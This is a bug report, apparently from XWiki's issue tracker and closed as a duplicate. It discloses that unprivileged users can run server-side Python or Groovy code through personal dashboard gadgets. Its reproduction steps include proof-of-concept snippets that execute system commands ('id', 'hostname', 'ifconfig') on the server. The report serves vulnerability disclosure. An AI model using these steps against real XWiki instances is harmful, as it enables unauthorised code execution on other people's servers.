Details
- Bug
- Resolution: Duplicate
- Critical
- None
- 7.2, 8.4.4, 11.10.2
- High
- Unknown
Description
Registered users without scripting/programming permissions are able to execute Python/Groovy scripts while editing their personal dashboard.
Full steps to reproduce:
1) Create a new user on xwiki.org (or myxwiki.org).
2) Go to Profile -> Edit -> My dashboard -> Add gadget.
3) Choose either the Python or the Groovy gadget.
4) Paste the following Python or Groovy code (for a Unix-hosted XWiki):
Python:
    import os
    print(os.popen("id").read())
    print(os.popen("hostname").read())
    print(os.popen("ifconfig").read())
Groovy:
    r = Runtime.getRuntime()
    proc = r.exec('id');
    BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));
    String s1 = null;
    while ((s1 = stdInput1.readLine()) != null) { print s1; }
5) Submit the gadget.
Expected behaviour:
- The user is unable to execute server-side code, because the account lacks the required permissions.
Current behaviour:
- The user can execute server-side code, as seen in the attached screenshots.
This issue affects all versions of XWiki that have the personal dashboard feature.
Attachments
Issue Links
- duplicates XWIKI-14247: User without scripting rights can execute velocity/python scripts through velocity/python gadgets in Dashboard WebHome and User Profile dashboard. (Closed)